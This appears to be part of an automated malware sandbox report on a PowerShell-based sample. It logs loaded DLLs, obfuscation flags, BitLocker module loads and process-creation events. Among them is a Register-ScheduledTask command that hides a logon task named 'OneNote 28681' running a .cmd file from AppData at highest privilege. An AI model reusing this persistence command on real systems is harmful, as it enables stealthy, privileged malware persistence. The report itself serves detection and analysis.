    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior

    Data Obfuscation

    barindex
    Suspicious powershell command line found
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\user\Desktop\UrgenteNotificationRef')
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote 28681' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\Network28681Man.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\user\AppData\Roaming\Network28681Man')
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote 28681' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\Network28681Man.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hiddenJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\user\Desktop\UrgenteNotificationRef')Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote 28681' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\Network28681Man.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -ForceJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\user\AppData\Roaming\Network28681Man')
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote 28681' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\Network28681Man.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_0447E6F3 pushad ; iretd 7_2_0447E75A
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_0447E75F pushad ; iretd 7_2_0447E762
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_044742A8 push ebx; ret 7_2_044742DA
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_0447DC53 push esp; iretd 7_2_0447DC5A
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_0447DC51 push esp; iretd 7_2_0447DC52
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_0447EC7B pushfd ; iretd 7_2_0447EC81
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_0447AC93 push ds; iretd 7_2_0447AC9A
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_0447AC90 push ds; iretd 7_2_0447AC92
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_0447DE48 push ebp; iretd 7_2_0447DE4A
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_04479861 push ss; iretd 7_2_04479862
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_044798B9 push ss; iretd 7_2_044798BA
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_0447997B push ss; iretd 7_2_04479982
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_04479978 push ss; iretd 7_2_0447997A
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_04479923 push ss; iretd 7_2_0447992A
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_04479920 push ss; iretd 7_2_04479922
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_044799D9 push ss; iretd 7_2_044799DA
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_04479A41 push ss; iretd 7_2_04479A42
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_04479AA3 push ss; iretd 7_2_04479AAA
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_04473AA8 push ebx; retf 7_2_04473ADA
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_04479B73 push ss; iretd 7_2_04479B7A
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_04479B70 push ss; iretd 7_2_04479B72
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_04479B09 push ss; iretd 7_2_04479B0A
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_0447DBD9 push ebx; iretd 7_2_0447DBDA
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00F361B0 push esp; ret 10_2_00F361F9
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00F36215 push esp; ret 10_2_00F361F9
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00E1C031 push ebx; ret 12_2_00E1C03E
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00E1C1F3 pushfd ; ret 12_2_00E1C202
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00E1C981 pushfd ; ret 12_2_00E1C986
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00E1EB5C push ds; retf 0071h12_2_00E1EB63
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00E1ADF1 pushad ; ret 12_2_00E1ADFE
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00E1ADA9 pushad ; ret 12_2_00E1ADB6

    Hooking and other Techniques for Hiding and Protection

    barindex
    Loading BitLocker PowerShell Module
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
    Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
